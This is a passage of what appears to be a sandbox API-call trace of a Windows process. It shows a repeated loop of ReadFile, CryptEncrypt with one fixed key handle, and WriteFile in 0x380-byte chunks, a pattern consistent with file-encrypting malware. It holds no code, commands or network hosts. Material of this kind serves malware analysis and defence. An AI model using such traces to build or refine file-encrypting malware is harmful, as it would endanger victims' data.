returned 1 [0281.977] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.977] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.977] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.977] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.977] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.977] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.977] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.977] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.978] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.978] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.978] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.978] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.978] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.978] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.978] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.978] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.978] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.978] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.978] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.978] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.978] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.978] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.979] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.979] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.979] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.979] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.979] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.979] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.979] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.979] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.979] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.979] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.979] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.979] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.979] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.980] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.980] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.980] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.980] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.980] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.980] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.980] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.980] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.980] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.980] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.980] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.980] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.980] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.980] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.981] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.981] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.981] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.981] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.981] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.981] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.981] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.981] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.981] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.981] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.981] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.981] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.981] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.981] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.981] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.982] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.982] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.982] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.982] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.982] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.982] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.983] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.983] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.983] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.983] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.983] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.983] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.983] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.983] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.983] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.983] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.983] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.983] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.983] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.983] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.983] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.984] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.984] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.984] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.984] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.984] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.984] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.984] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.985] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.985] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.985] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.985] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.985] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.985] ReadFile (in: 